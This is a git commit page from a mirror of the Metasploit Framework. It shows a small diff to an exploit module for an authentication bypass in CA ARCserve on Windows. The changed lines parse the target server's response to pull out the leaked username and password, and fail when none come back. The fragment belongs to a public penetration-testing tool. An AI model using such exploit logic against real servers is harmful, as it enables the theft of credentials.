infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Put lipstick on this pig for the time being

unstable
HD Moore 2012-07-15 21:35:29 -05:00
parent 4509c11916
commit 7f3aeca501
1 changed files with 13 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
View File

@ -90,18 +90,24 @@ class Metasploit3 < Msf::Exploit::Remote
}
}, 5)
if not res
fail_with(Exploit::Failure::NotFound, 'The server did not respond to our request')
end
resp = res.to_s.split(',')
user_index = resp.index("\"user\"")
pass_index = resp.index("\"password\"")
if user_index.nil? or pass_index.nil?
#We don't find 'user' or 'password', we'll just set them as nil,
#and then handle it later after report_auth_info()
user = nil
pass = nil
else
user = resp[user_index+1].gsub(/\"/, "")
if user_index.nil? and pass_index.nil?
# Not a vulnerable server (blank user/pass doesn't help us)
fail_with(Exploit::Failure::NotFound, 'The server did not return credentials')
end
user = resp[user_index+1].gsub(/\"/, "")
pass = ""
if pass_index
pass = resp[pass_index+1].gsub(/\"/, "")
end